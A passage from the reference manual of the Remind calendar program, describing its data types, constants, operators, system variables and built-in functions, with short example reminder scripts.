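# Triggered on the 23rd, since the 24th is OMITted:
REM 25 Dec 2012 -1 MSG Pre-Christmas errands
POP-OMIT-CONTEXT
# Global OMITs introduced above are now discarded.
```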
- DATETIME
The DATETIME data type consists of a date and time together. Internally, DATETIME objects are stored as the number of minutes since midnight, 1 January 1990. You can think of a DATETIME object as being the combination of DATE and TIME parts.
CONSTANTS
The following examples illustrate constants in Remind expressions:
- INT constants
12, 36, -10, 0, 1209
- STRING constants
"Hello there", "This is a test", "\n\gosd\w", ""
Note that the empty string is represented by "", and that backslashes in a string are not interpreted specially, as they are in C.
- TIME constants
12:33, 0:01, 14:15, 16:42, 12.16, 13.00, 1.11
Note that TIME constants are written in 24-hour format. Either the period or colon can be used to separate the minutes from the hours. However, Remind will consistently output times using only one separator character. (The output separator character is chosen at compile-time.)
- DATE constants
DATE constants are expressed as 'yyyy/mm/dd' or 'yyyy-mm-dd', and the single quotes must be supplied. This distinguishes date constants from division or subtraction of integers. Examples:
'1993/02/22', '1992-12-25', '1999/01/01'
Note that DATE values are printed without the quotes. Although either '-' or '/' is accepted as a date separator on input, when dates are printed, only one will be used. The choice of whether to use '-' or '/' is made at compile-time. Note also that versions of Remind prior to 03.00.01 did not support date constants. In those versions, you must create dates using the date() function. Also, versions prior to 03.00.02 did not support the '-' date separator.
- DATETIME constants
DATETIME constants are expressed similarly to DATE constants with the addition of an "@HH:MM" part. For example:
'2008-04-05@23:11', '1999/02/03@14:06', '2001-04-07@08:30'
DATETIME values are printed without the quotes. Notes about date and time separator characters for DATE and TIME constants apply also to DATETIME constants.
OPERATORS
Remind has the following operators. Operators on the same line have equal precedence, while operators on lower lines have lower precedence than those on higher lines. The operators approximately correspond to C operators.
!  -  (unary logical negation and arithmetic negation)
*  /  %
+  -
<  <=  >  >=
==  !=
&&
||
DESCRIPTION OF OPERATORS
- !
Unary logical negation: !x returns 1 if x is zero, and 0 otherwise.
- -
The binary '-' operator accepts the following combinations of operand types:
INT - INT - returns the difference of two INTs.
DATE - DATE - returns (as an INT) the difference in days between two DATEs.
TIME - TIME - returns (as an INT) the difference in minutes between two TIMEs.
DATETIME - DATETIME - returns (as an INT) the difference in minutes between two DATETIMEs.
DATE - INT - returns a DATE that is INT days earlier than the original DATE.
TIME - INT - returns a TIME that is INT minutes earlier than the original TIME.
DATETIME - INT - returns a DATETIME that is INT minutes earlier than the original DATETIME.
- <, <=, >, and >=
These are the comparison operators. They can take operands of any type, but both operands must be of the same type. The comparison operators return 1 if the comparison is true, or 0 if it is false. Note that string comparison is done following the lexical ordering of characters on your system, and that upper and lower case are distinct for these operators.
- ==, !=
These are the equality and inequality operators. They can take operands of any type, but both operands must be of the same type. They return 1 if the comparison is true, and 0 if it is false.
Note also that the && and || operators always evaluate both of their operands, unlike their C counterparts. Thus, an expression such as:
(f != 0) && (100/f < 3)
will cause an error if f is zero.
VARIABLES
Remind allows you to assign values to variables. The SET command is used as follows:
SET var expr
Var is the name of a variable. It must start with a letter or underscore, and consist only of letters, digits and underscores. Only the first 12 characters of a variable name are significant. Variable names are not case sensitive; thus, "Afoo" and "afOo" are the same variable. Examples:
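For instance (the variable names and values are purely illustrative):

    SET a 10
    SET b a*2 + 3
    SET greeting "Hello, " + "world"
    SET d '1994-01-11'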
SYSTEM VARIABLES
In addition to the regular user variables, Remind has several "system variables" that are used to query or control the operating state of Remind. System variables are available starting from version 03.00.07 of Remind.
All system variables begin with a dollar sign '$'. They can be used in SET commands and expressions just as regular variables can. All system variables always hold values of a specified type. In addition, some system variables cannot be modified, and you cannot create new system variables. System variables can be initialized on the command line with the -i option, but you may need to quote them to avoid having the shell interpret the dollar sign. System variable names are not case-sensitive.
The following system variables are defined. Those marked "read-only" cannot be changed with the SET command. All system variables hold values of type INT, unless otherwise specified.
- $CalcUTC
If 1 (the default), then Remind uses C library functions to calculate the number of minutes between local and Universal Time Coordinated. This affects astronomical calculations (sunrise() for example.) If 0, then you must supply the number of minutes between local and Universal Time Coordinated in the $MinsFromUTC system variable.
- $CalMode (read-only)
If non-zero, then the -c option was supplied on the command line.
- $Daemon (read-only)
If the daemon mode -z was invoked, contains the number of minutes between wakeups. If not running in daemon mode, contains 0.
- $DateSep
This variable can be set only to "/" or "-". It holds the character used to separate portions of a date when Remind prints a DATE or DATETIME value.
- $DefaultPrio
The default priority assigned to reminders without a PRIORITY clause. You can set this as required to adjust the priorities of blocks of reminders without having to type priorities for individual reminders. At startup, $DefaultPrio is set to 5000; it can range from 0 to 9999.
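For example, a block of reminders can be given a different default priority, with the original restored afterwards (the reminders shown are hypothetical):

    SET $DefaultPrio 2000
    REM 1 MSG Pay rent
    REM 15 MSG Pay car insurance
    SET $DefaultPrio 5000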
- $DontFork (read-only)
If non-zero, then the -f option was supplied on the command line.
- $DontTrigAts (read-only)
The number of times that the -a option was supplied on the command line.
- $DontQueue (read-only)
If non-zero, then the -q option was supplied on the command line.
- $EndSent (STRING type)
Contains a list of characters that end a sentence. The MSF keyword inserts two spaces after these characters. Initially, $EndSent is set to ".!?" (period, exclamation mark, and question mark.)
- $EndSentIg (STRING type)
Contains a list of characters that should be ignored when MSF decides whether or not to place two spaces after a sentence. Initially, $EndSentIg is set to "'>)]}"+CHAR(34) (single-quote, greater-than, right parenthesis, right bracket, right brace, and double-quote.)
For example, the default values work as follows:
MSF He said, "Huh! (Two spaces will follow this.)" Yup.
because the final parenthesis and quote are ignored (for the purposes of spacing) when they follow a period.
- $FirstIndent
The number of spaces by which to indent the first line of a MSF-type reminder. The default is 0.
- $FoldYear
The standard Unix library functions may have difficulty dealing with dates later than 2037. If this variable is set to 1, then the UTC calculations "fold back" years later than 2037 before using the Unix library functions. For example, to find out whether or not daylight saving time is in effect in June, 2077, the year is "folded back" to 2010, because both years begin on a Monday, and both are non-leapyears. The rules for daylight saving time are thus presumed to be identical for both years, and the Unix library functions can handle 2010. By default, this variable is 0. Set it to 1 if the sun or UTC functions misbehave for years greater than 2037.
- $FormWidth
The maximum width of each line of text for formatting MSF-type reminders. The default is 59.
- $LatDeg, $LatMin, $LatSec
These specify the latitude of your location. Northern latitudes are positive; southern ones are negative. For southern latitudes, all three components should be negative.
- $Location (STRING type)
This is a string specifying the name of your location. It is usually the name of your town or city. It can be set to whatever you like, but good style indicates that it should be kept consistent with the latitude and longitude system variables.
- $LongDeg, $LongMin, $LongSec
These specify the longitude of your location. $LongDeg can range from -180 to 180. Western longitudes are positive; eastern ones are negative. Note that all three components should have the same sign: All positive for Western longitudes and all negative for Eastern longitudes.
The latitude and longitude information is required for the functions sunrise() and sunset(). Default values can be compiled into Remind, or you can SET the correct values at the start of your reminder scripts.
- $MaxSatIter
The maximum number of iterations for the SATISFY clause (described later.) Must be at least 10.
- $MinsFromUTC
The number of minutes between Universal Time Coordinated and local time. If $CalcUTC is non-zero, this is calculated upon startup of Remind. Otherwise, you must set it explicitly. If $CalcUTC is zero, then $MinsFromUTC is used in the astronomical calculations. You must adjust it for daylight saving.
- $NumTrig (read-only)
Contains the number of reminders triggered for the current date. One use for this variable is as follows: Suppose you wish to shade in the box of a PostScript calendar whenever a holiday is triggered. You could save the value of $NumTrig in a regular variable prior to executing a block of holiday reminders. If the value of $NumTrig after the holiday block is greater than the saved value, then at least one holiday was triggered, and you can execute the command to shade in the calendar box. (See the section "Calendar Mode".)
Note that $NumTrig is affected only by REM commands; triggers in IFTRIG commands do not affect it.
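A sketch of the shading technique described above, using the psshade() function documented under BUILT-IN FUNCTIONS (the holiday reminders are illustrative):

    SET savetrig $NumTrig
    REM Jan 1 MSG New Year's Day
    REM Jul 1 MSG Canada Day
    IF $NumTrig > savetrig
       REM [trigger(today())] PS [psshade(90)]
    ENDIF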
- $PrefixLineNo (read-only)
If non-zero, then the -l option was supplied on the command line.
- $SortByTime (read-only)
Set to 0 if the -g option was not used, 1 if sorting by time in ascending order, or 2 if sorting by time in descending order.
- $SubsIndent
The number of spaces by which all lines (except the first) of an MSF-type reminder should be indented. The default is 0.
- $T (read-only, DATE type)
Exactly equivalent to trigdate(). (See BUILT-IN FUNCTIONS.)
- $Td (read-only)
Equivalent to day(trigdate()).
- $Tm (read-only)
Equivalent to monnum(trigdate()).
- $Tw (read-only)
Equivalent to wkdaynum(trigdate()).
- $Ty (read-only)
Equivalent to year(trigdate()).
- $TimeSep
This variable can be set only to ":" or ".". It holds the character used to separate portions of a time when Remind prints a TIME or DATETIME value.
- $UntimedFirst (read-only)
Set to 1 if the -g option is used with a fourth sort character of "d"; set to 0 otherwise.
- $U (read-only, DATE type)
Exactly equivalent to today(). (See BUILT-IN FUNCTIONS.)
- $Ud (read-only)
Equivalent to day(today()).
- $Um (read-only)
Equivalent to monnum(today()).
- $Uw (read-only)
Equivalent to wkdaynum(today()).
- $Uy (read-only)
Equivalent to year(today()).
Note: If any of the calendar modes are in effect, then the values of $Daemon, $DontFork, $DontTrigAts, $DontQueue, $HushMode, $IgnoreOnce, $InfDelta, and $NextMode are not meaningful.
BUILT-IN FUNCTIONS
Remind has a plethora of built-in functions. The syntax for a function call is the same as in C - the function name, followed by a parenthesized, comma-separated list of arguments. Function names are not case-sensitive. If a function takes no arguments, it must be followed by "()" in the function call; otherwise, Remind will interpret it as a variable name, and will probably not work correctly.
In the descriptions below, short forms are used to denote acceptable types for the arguments. The characters "i", "s", "d", "t" and "q" denote INT, STRING, DATE, TIME and DATETIME arguments, respectively. If an argument can be one of several types, the characters are concatenated. For example, "di_arg" denotes an argument that can be a DATE or an INT. "x_arg" denotes an argument that can be of any type. The type of the argument is followed by an underscore and an identifier naming the argument.
The built-in functions are:
- abs(i_num)
Returns the absolute value of num.
- access(s_file, si_mode)
Tests the access permissions for the file file. Mode can be a string, containing a mix of the characters "rwx" for read, write and execute permission testing. Alternatively, mode can be a number as described in the UNIX access(2) system call. The function returns 0 if the file can be accessed with the specified mode, and -1 otherwise.
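For example, an optional file could be included only when it exists and is readable (the file name here is hypothetical):

    IF access(getenv("HOME")+"/.extra-reminders", "r") == 0
       INCLUDE [getenv("HOME")]/.extra-reminders
    ENDIF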
- args(s_fname)
Returns the number of arguments expected by the user-defined function fname, or -1 if no such user-defined function exists. Note that this function examines only user-defined functions, not built-in functions. Its main use is to determine whether or not a particular user-defined function has been defined previously. The args() function is available only in versions of Remind from 03.00.04 and up.
- asc(s_string)
Returns an INT that is the ASCII code of the first character in string. As a special case, asc("") returns 0.
- baseyr()
Returns the "base year" that was compiled into Remind (normally 1990.) All dates are stored internally as the number of days since 1 January of baseyr().
- char(i_i1 [,i_i2...])
This function can take any number of INT arguments. It returns a STRING consisting of the characters specified by the arguments. Note that none of the arguments can be 0, unless there is only one argument. As a special case, char(0) returns "".
Note that because Remind does not support escaping of characters in strings, the only way to get a double-quote in a string is to use char(34).
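For example, to build a string containing double quotes:

    SET s char(34) + "hello" + char(34)

This sets s to the seven-character string "hello", including the quote characters.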
- choose(i_index, x_arg1 [,x_arg2...])
Choose must take at least two arguments, the first of which is an INT. If index is n, then the nth subsequent argument is returned. If index is less than 1, then arg1 is returned. If index is greater than the number of subsequent arguments, then the last argument is returned. Examples:
choose(0, "foo", 1:13, 1000) returns "foo"
choose(1, "foo", 1:13, 1000) returns "foo"
choose(2, "foo", 1:13, 1000) returns 1:13
choose(3, "foo", 1:13, 1000) returns 1000
choose(4, "foo", 1:13, 1000) returns 1000
Note that all arguments to choose() are always evaluated.
- coerce(s_type, x_arg)
This function converts arg to the specified type, if such conversion is possible. Type must be one of "INT", "STRING", "DATE", "TIME" or "DATETIME" (case-insensitive). The conversion rules are as follows:
If arg is already of the type specified, it is returned unchanged.
If type is "STRING", then arg is converted to a string consisting of its printed representation.
If type is "DATE", then an INT arg is converted by interpreting it as the number of days since 1 January baseyr(). A STRING arg is converted by attempting to read it as if it were a printed date. A DATETIME is converted to a date by dropping the time component. A TIME arg cannot be converted to a date.
If type is "TIME", then an INT arg is converted by interpreting it as the number of minutes since midnight. A STRING arg is converted by attempting to read it as if it were a printed time. A DATETIME is converted to a time by dropping the date component. A DATE arg cannot be converted to a time.
If type is "DATETIME", then an INT arg is converted by interpreting it as the number of minutes since midnight, 1 January baseyr(). A STRING is converted by attempting to read it as if it were a printed datetime. Other types cannot be converted to a datetime.
If type is "INT", then DATE, TIME and DATETIME arguments are converted using the reverse of procedures described above. A STRING arg is converted by parsing it as an integer.
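Some examples that follow directly from the rules above:

    coerce("STRING", 13:00)              returns "13:00"
    coerce("TIME", 90)                   returns 1:30
    coerce("DATE", '2008-04-05@23:11')   returns 2008-04-05
    coerce("INT", "123")                 returns 123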
- current()
Returns the current date and time as a DATETIME object. This may be the actual date and time, or may be the date and time supplied on the command line.
- date(i_y, i_m, i_d)
The date() function returns a DATE object with the year, month and day components specified by y, m and d.
- datepart(dq_datetime)
Returns a DATE object representing the date portion of datetime.
- datetime(args)
The datetime() function can take anywhere from two to five arguments. It always returns a DATETIME generated from its arguments.
If you supply two arguments, the first must be a DATE and the second a TIME.
If you supply three arguments, the first must be a DATE and the second and third must be INTs. The second and third arguments are interpreted as hours and minutes and converted to a TIME.
If you supply four arguments, the first three must be INTs, interpreted as the year, month and day. The fourth argument must be a TIME.
Finally, if you supply five arguments, they must all be INTs and are interpreted as year, month, day, hour and minute.
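For example, each of the following calls returns the DATETIME 2008-04-05@13:00:

    datetime('2008-04-05', 13:00)
    datetime('2008-04-05', 13, 0)
    datetime(2008, 4, 5, 13:00)
    datetime(2008, 4, 5, 13, 0)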
- dawn([dq_date])
Returns the time of "civil dawn" on the specified date. If date is omitted, defaults to today(). If a datetime object is supplied, only the date component is used.
- day(dq_date)
This function takes a DATE or DATETIME as an argument, and returns an INT that is the day-of-month component of date.
- daysinmon(i_m, i_y)
Returns the number of days in month m (1-12) of the year y.
- defined(s_var)
Returns 1 if the variable named by var is defined, or 0 if it is not.
Note that defined() takes a STRING argument; thus, to check if variable X is defined, use:
defined("X")
and not:
defined(X)
The second example will attempt to evaluate X, and will return an error if it is undefined or not of type STRING.
- dosubst(s_str [,d_date [,t_time]]) or dosubst(s_str [,q_datetime])
Returns a STRING that is the result of passing str through the substitution filter described earlier. The parameters date and time (or datetime) establish the effective trigger date and time used by the substitution filter. If date and time are omitted, they default to today() and now().
Note that if str does not end with "%", a newline character will be added to the end of the result. Also, calling dosubst() with a date that is in the past (i.e., if date < today()) will produce undefined results.
Dosubst() is only available starting from version 03.00.04 of Remind.
- dusk([dq_date])
Returns the time of "civil twilight" on the specified date. If date is omitted, defaults to today().
- easterdate(dqi_arg)
If arg is an INT, then returns the date of Easter Sunday for the specified year. If arg is a DATE or DATETIME, then returns the date of the next Easter Sunday on or after arg. (The time component of a datetime is ignored.)
- evaltrig(s_trigger [,dq_start])
Evaluates trigger as if it were a REM or IFTRIG trigger specification and returns the trigger date as a DATE (or as a DATETIME if there is an AT clause.) Returns a negative INT if no trigger could be computed.
Normally, evaltrig finds a trigger date on or after today. If you supply the start argument, then it scans starting from there.
For example, the expression:
evaltrig("Mon 1", '2008-10-07')
returns '2008-11-03', since that is the first date on or after 7 October 2008 that satisfies "Mon 1".
If you want to see how many days it is from the first Monday in October, 2008 to the first Monday in November, 2008, use:
evaltrig("Mon 1", '2008-11-01') - evaltrig("Mon 1", '2008-10-01')
and the answer is 28. The trigger argument to evaltrig can have all the usual trigger clauses (OMIT, AT, SKIP, etc.) but cannot have a SATISFY, MSG, etc. reminder-type clause.
- filedate(s_filename)
Returns the modification date of filename. If filename does not exist, or its modification date is before the year baseyr(), then 1 January of baseyr() is returned.
- filedatetime(s_filename)
Returns the modification date and time of filename. If filename does not exist, or its modification date is before the year baseyr(), then midnight, 1 January of baseyr() is returned.
- filedir()
Returns the directory that contains the current file being processed. It may be a relative or absolute pathname, but is guaranteed to be correct for use in an INCLUDE command as follows:
INCLUDE [filedir()]/stuff
This includes the file "stuff" in the same directory as the current file being processed.
- filename()
Returns (as a STRING) the name of the current file being processed by Remind. Inside included files, returns the name of the included file.
- getenv(s_envvar)
Similar to the getenv(3) library function. Returns a string representing the value of the specified environment variable. Returns "" if the environment variable is not defined. Note that the names of environment variables are generally case-sensitive; thus, getenv("HOME") is not the same as getenv("home").
- hebdate(i_day, s_hebmon [,idq_yrstart [,i_jahr [,i_aflag]]])
Support for Hebrew dates - see the section "The Hebrew Calendar"
- hebday(dq_date)
Support for Hebrew dates - see the section "The Hebrew Calendar"
- hebmon(dq_date)
Support for Hebrew dates - see the section "The Hebrew Calendar"
- hebyear(dq_date)
Support for Hebrew dates - see the section "The Hebrew Calendar"
- hour(tq_time)
Returns the hour component of time.
- iif(si_test1, x_arg1, [si_test2, x_arg2,...], x_default)
If test1 is not zero or the null string, returns arg1. Otherwise, if test2 is not zero or the null string, returns arg2, and so on. If all of the test arguments are false, returns default. Note that all arguments are always evaluated. This function accepts an odd number of arguments - note that prior to version 03.00.05 of Remind, it accepted 3 arguments only. The 3-argument version of iif() is compatible with previous versions of Remind.
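Examples:

    iif(1, "a", "b")           returns "a"
    iif(0, "a", "b")           returns "b"
    iif(0, "a", 1, "b", "c")   returns "b"
    iif(0, "a", 0, "b", "c")   returns "c"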
- index(s_search, s_target [,i_start])
Returns an INT that is the location of target in the string search. The first character of a string is numbered 1. If target does not exist in search, then 0 is returned.
The optional parameter start specifies the position in search at which to start looking for target.
- isdst([d_date [,t_time]]) or isdst(q_datetime)
Returns a positive number if daylight saving time is in effect on the specified date and time. Date defaults to today() and time defaults to midnight.
Note that this function is only as reliable as the C run-time library functions. It is available starting with version 03.00.07 of Remind.
- isleap(idq_arg)
Returns 1 if arg is a leap year, and 0 otherwise. Arg can be an INT, DATE or DATETIME object. If a DATE or DATETIME is supplied, then the year component is used in the test.
- isomitted(dq_date)
Returns 1 if date is omitted, given the current global OMIT context. Returns 0 otherwise. (If a datetime is supplied, only the date part is used.) Note that any local OMIT or OMITFUNC clauses are not taken into account by this function.
- language()
Returns a STRING naming the language supported by Remind. (See "Foreign Language Support.") By default, Remind is compiled to support English messages, so this function returns "English". For other languages, this function will return the English name of the language (e.g. "German"). Note that language() is not available in versions of Remind prior to 03.00.02.
- lower(s_string)
Returns a STRING with all upper-case characters in string converted to lower-case.
- max(x_arg1 [,x_arg2...])
Can take any number of arguments, and returns the maximum. The arguments can be of any type, but must all be of the same type. They are compared as with the > operator.
- min(x_arg1 [,x_arg2...])
Can take any number of arguments, and returns the minimum. The arguments can be of any type, but must all be of the same type. They are compared as with the < operator.
- minsfromutc([d_date [,t_time]]) or minsfromutc(q_datetime)
Returns the number of minutes from Universal Time Coordinated (formerly GMT) to local time on the specified date and time. Date defaults to today() and time defaults to midnight. If local time is before UTC, the result is negative. Otherwise, the result is positive.
Note that this function is only as reliable as the C run-time library functions. It is available starting with version 03.00.07 of Remind.
- minute(tq_time)
Returns the minute component of time.
- mon(dqi_arg)
If arg is of DATE or DATETIME type, returns a string that names the month component of the date. If arg is an INT from 1 to 12, returns a string that names the month.
- monnum(dq_date)
Returns an INT from 1 to 12, representing the month component of date.
- moondate(i_phase [,d_date [,t_time]]) or moondate(i_phase, q_datetime)
This function returns the date of the first occurrence of the specified phase of the moon on or after date and time (which default to today() and midnight, respectively). Phase is an INT from 0 to 3: 0 specifies the new moon, 1 the first quarter, 2 the full moon, and 3 the third quarter.
For example, the following returns the date of the next full moon:
SET fullmoon moondate(2)
- moontime(i_phase [,d_date [,t_time]]) or moontime(i_phase, q_datetime)
This function returns the time of the first occurrence of the specified phase of the moon on or after date and time. Moontime() is intended to be used in conjunction with moondate(). The moondate() and moontime() functions are accurate to within a couple of minutes of the times in "Old Farmer's Almanac" for Ottawa, Ontario.
For example, the following reminder displays the date and time of the next full moon:
REM MSG Next full moon at [moontime(2)] on [moondate(2)]
- moondatetime(i_phase [,d_date [,t_time]]) or moondatetime(i_phase, q_datetime)
This function is similar to moondate and moontime, but returns a DATETIME result.
- moonphase([d_date [,t_time]]) or moonphase(q_datetime)
This function returns the phase of the moon on date and time, which default to today() and midnight, respectively. The returned value is an integer from 0 to 359, representing the phase of the moon in degrees. 0 is a new moon, 180 is a full moon, 90 is first-quarter, etc.
- nonomitted(dq_start, dq_end [,s_wkday...])
This function returns the number of non-omitted days between start and end. If start is non-omitted, then it is counted. end is never counted.
Note that end must be greater than or equal to start or an error is reported. In addition to using the global OMIT context, you can supply additional arguments that are names of weekdays to be omitted. However, in a REM command, any local OMITFUNC clause is not taken into account by this function.
For example, the following line sets a to 11 (assuming no global OMITs):
set a nonomitted('2007-08-01', '2007-08-16', "Sat", "Sun")
because Thursday, 16 August 2007 is the 11th working day (not counting Saturday and Sunday) after Wednesday, 1 August 2007.
nonomitted has various uses. For example, many schools run on a six-day cycle and the day number is not incremented on holidays. Suppose the school year starts with Day 1 on 4 September 2007. The following reminder will label day numbers in a calendar:
IF today() >= '2007-09-04'
   set daynum nonomitted('2007-09-04', today(), "Sat", "Sun")
   REM OMIT SAT SUN SKIP CAL Day [(daynum % 6) + 1]
ENDIF
Obviously, the answer you get from nonomitted depends on the global OMIT context. If you use moveable OMITs, you may get inconsistent results.
Here is a more complex use for nonomitted. My garbage collection follows two interleaved 14-day cycles: One Friday, garbage and paper recycling ("Black Box") are collected. The next Friday, garbage and plastic recycling ("Blue Box") are collected. If any of Monday-Friday is a holiday, collection is delayed until the Saturday. Here's a way to encode these rules:
fset _garbhol(x) wkdaynum(x) == 5 && nonomitted(x-4, x+1) < 5
REM 12 November 1999 *14 AFTER OMITFUNC _garbhol MSG Black Box
REM 19 November 1999 *14 AFTER OMITFUNC _garbhol MSG Blue Box
Here's how it works: The _garbhol(x) user-defined function returns 1 if and only if (1) x is a Friday and (2) there is at least one OMITted day from the previous Monday up to and including the Friday.
The first REM statement sets up the 14-day black-box cycle. The AFTER keyword makes it move collection to the Saturday if _garbhol returns 1. The second REM statement sets up the 14-day blue-box cycle with a similar adjustment made by AFTER in conjunction with _garbhol.
- now()
Returns the current system time, as a TIME type. This may be the actual time, or a time supplied on the command line.
- ord(i_num)
Returns a string that is the ordinal number num. For example, ord(2) returns "2nd", and ord(213) returns "213th".
- ostype()
Returns "UNIX". Remind used to run on OS/2 and MS-DOS, but does not any longer.
- plural(i_num [,s_str1 [,s_str2]])
Can take from one to three arguments. If one argument is supplied, returns "s" if num is not 1, and "" if num is 1.
If two arguments are supplied, returns str1 + "s" if num is not 1. Otherwise, returns str1.
If three arguments are supplied, returns str1 if num is 1, and str2 otherwise.
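Examples:

    plural(1)                returns ""
    plural(2)                returns "s"
    plural(2, "day")         returns "days"
    plural(1, "ox", "oxen")  returns "ox"
    plural(2, "ox", "oxen")  returns "oxen"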
- psmoon(i_phase [,i_size [,s_note [,i_notesize]]])
[DEPRECATED] Returns a STRING consisting of PostScript code to draw a moon in the upper-left hand corner of the calendar box. Phase specifies the phase of the moon, and is 0 (new moon), 1 (first quarter), 2 (full moon) or 3 (third quarter). If size is specified, it controls the radius of the moon in PostScript units (1/72 inch.) If it is not specified or is negative, the size of the day-number font is used.
For example, the following four lines place moon symbols on the PostScript calendar:
REM [moondate(0)] PS [psmoon(0)]
REM [moondate(1)] PS [psmoon(1)]
REM [moondate(2)] PS [psmoon(2)]
REM [moondate(3)] PS [psmoon(3)]
If note is specified, the text is used to annotate the moon display. The font is the same font used for calendar entries. If notesize is given, it specifies the font size to use for the annotation, in PostScript units (1/72 inch.) If notesize is not given, it defaults to the size used for calendar entries. (If you annotate the display, be careful not to overwrite the day number -- Remind does not check for this.) For example, if you want the time of each new moon displayed, you could use this in your reminder script:
REM [moondate(0)] PS [psmoon(0, -1, moontime(0)+"")]
Note how the time is coerced to a string by concatenating the null string.
- psshade(i_gray) or psshade(i_red, i_green, i_blue)
[DEPRECATED] Returns a STRING that consists of PostScript commands to shade a calendar box. Gray can range from 0 (completely black) to 100 (completely white.) If three arguments are given, they specify red, green and blue intensities from 0 to 100. Here's an example of how to use this:
REM Sat Sun PS [psshade(95)]
The above command emits PostScript code to lightly shade the boxes for Saturday and Sunday in a PostScript calendar.
Note that psmoon and psshade are deprecated; instead you should use the SPECIAL SHADE and SPECIAL MOON reminders as described in "Out-of-Band Reminders."
- realcurrent()
Returns (as a DATETIME) the true date and time of day as provided by the operating system. This is in contrast to current(), which may return a time supplied on the command line.
- realnow()
Returns the true time of day as provided by the operating system. This is in contrast to now(), which may return a time supplied on the command line.
- realtoday()
Returns the date as provided by the operating system. This is in contrast to Remind's concept of "today", which may be changed if it is running in calendar mode, or if a date has been supplied on the command line.
- sgn(i_num)
Returns -1 if num is negative, 1 if num is positive, and 0 if num is zero.
- shell(s_cmd [,i_maxlen])
Executes cmd as a system command, and returns the first 511 characters of output resulting from cmd. Any whitespace character in the output is converted to a space. Note that if RUN OFF has been executed, or the -r command-line option has been used, shell() will result in an error, and cmd will not be executed.
If maxlen is specified, then shell() returns the first maxlen characters of output (rather than the first 511). If maxlen is specified as a negative number, then all the output from cmd is returned.
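For example (assuming the standard hostname command is available on your system):

    SET host shell("hostname", -1)

Because whitespace in the output is converted to spaces, the trailing newline printed by hostname becomes a trailing space in host.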
- strlen(s_str)
Returns the length of str.
- substr(s_str, i_start [,i_end])
Returns a STRING consisting of all characters in str from start up to and including end. Characters are numbered from 1. If end is not supplied, then it defaults to the length of str.
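Examples:

    substr("working", 2, 4)  returns "ork"
    substr("working", 4)     returns "king"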
- sunrise([dq_date])
Returns a TIME indicating the time of sunrise on the specified date (default today().) In high latitudes, there may be no sunrise on a particular day, in which case sunrise() returns the INT 0 if the sun never sets, or 1440 if it never rises.
- sunset([dq_date])
Returns a TIME indicating the time of sunset on the specified date (default today().) In high latitudes, there may be no sunset on a particular day, in which case sunset() returns the INT 0 if the sun never rises, or 1440 if it never sets.
The functions sunrise() and sunset() are based on an algorithm in "Almanac for Computers for the year 1978" by L. E. Doggett, Nautical Almanac Office, USNO. They require the latitude and longitude to be specified by setting the appropriate system variables. (See "System Variables".) The sun functions should be accurate to within about 4 minutes for latitudes lower than 60 degrees. The functions are available starting from version 03.00.07 of Remind.
- time(i_hr, i_min)
Creates a TIME with the hour and minute components specified by hr and min.
- timepart(tq_datetime)
Returns a TIME object representing the time portion of datetime.
- today()
Returns Remind's notion of "today." This may be the actual system date, or a date supplied on the command line, or the date of the calendar entry currently being computed.
- trigdate()
Returns the calculated trigger date of the last REM or IFTRIG command. If used in the body of a REM command, returns that command's trigger date. If the most recent REM command did not yield a computable trigger date, returns the integer 0.
- trigdatetime()
Similar to trigdate(), but returns a DATETIME if the most recent triggerable REM command had an AT clause. If there was no AT clause, returns a DATE. If no trigger could be computed, returns the integer 0.
- trigger(d_date [,t_time [,i_utcflag]]) or trigger(q_datetime [,i_utcflag])
Returns a string suitable for use in a REM command or a SCANFROM or UNTIL clause, allowing you to calculate trigger dates in advance. Note that in earlier versions of Remind, trigger was required to convert a date into something the REM command could consume. However, in this version of Remind, you can omit it. Note that trigger() always returns its result in English, even for foreign-language versions of Remind. This is to avoid problems with certain C libraries that do not handle accented characters properly. Normally, the date and time are the local date and time; however, if utcflag is non-zero, the date and time are interpreted as UTC times, and are converted to local time. Examples:
trigger('1993/04/01')
returns "1 April 1993",
trigger('1994/08/09', 12:33)
returns "9 August 1994 AT 12:33", as does:
trigger('1994/08/09@12:33').
Finally:
trigger('1994/12/01', 03:00, 1)
returns "30 November 1994 AT 22:00" for EST, which is 5 hours behind UTC. The value for your time zone may differ.
- trigtime()
Returns the time of the last REM command with an AT clause. If the last REM did not have an AT clause, returns the integer 0.
- trigvalid()
Returns 1 if the value returned by trigdate() is valid for the most recent REM command, or 0 otherwise. Sometimes REM commands cannot calculate a trigger date. For example, the following REM command can never be triggered:
REM Mon OMIT Mon SKIP MSG Impossible!
- typeof(x_arg)
Returns "STRING", "INT", "DATE", "TIME" or "DATETIME", depending on the type of arg.
- tzconvert(q_datetime, s_srczone [,s_dstzone])
Converts datetime from the time zone named by srczone to the time zone named by dstzone. If dstzone is omitted, the default system time zone is used. The return value is a DATETIME. Time zone names are system-dependent; consult your operating system for legal values. Here is an example:
tzconvert('2007-07-08@01:14', "Canada/Eastern", "Canada/Pacific") returns 2007-07-07@22:14
- upper(s_string)
Returns a STRING with all lower-case characters in string converted to upper-case.
- value(s_varname [,x_default])
Returns the value of the specified variable. For example, value("X"+"Y") returns the value of variable XY, if it is defined. If XY is not defined, an error results.
However, if you supply a second argument, it is returned if the varname is not defined. The expression value("XY", 0) will return 0 if XY is not defined, and the value of XY if it is defined.
- version()
Returns a string specifying the version of Remind. For version 03.00.04, returns "03.00.04". It is guaranteed that as new versions of Remind are released, the value returned by version() will strictly increase, according to the rules for string ordering.
- weekno([dq_date, [i_wkstart, [i_daystart]]])
Returns the week number of the year. If no arguments are supplied, returns the ISO 8601 week number for today(). If one argument date is supplied, then returns the ISO 8601 week number for that date. If two arguments are supplied, then wkstart must range from 0 to 6, and represents the first day of the week (with 0 being Sunday and 6 being Saturday.). If wkstart is not supplied, then it defaults to 1. If the third argument daystart is supplied, then it specifies when Week 1 starts. If daystart is less than or equal to 7, then Week 1 starts on the first wkstart on or after January daystart. Otherwise, Week 1 starts on the first wkstart on or after December daystart. If omitted, daystart defaults to 29 (following the ISO 8601 definition.)
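The ISO 8601 default (week 1 begins on the first Monday on or after December 29th of the prior year) can be cross-checked with Python's datetime module. This is an independent illustration, not part of Remind:

```python
from datetime import date

# isocalendar() returns (ISO year, ISO week number, ISO weekday).
print(date(2007, 1, 1).isocalendar()[1])          # a Monday: week 1
print(tuple(date(2005, 1, 1).isocalendar())[:2])  # a Saturday: (2004, 53)
```

Note that, as in the second example, the ISO week-numbering year can differ from the calendar year near January 1st.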
- wkday(dqi_arg)
If arg is a DATE or DATETIME, returns a string representing the day of the week of the date. If arg is an INT from 0 to 6, returns the corresponding weekday ("Sunday" to "Saturday").
- wkdaynum(dq_date)
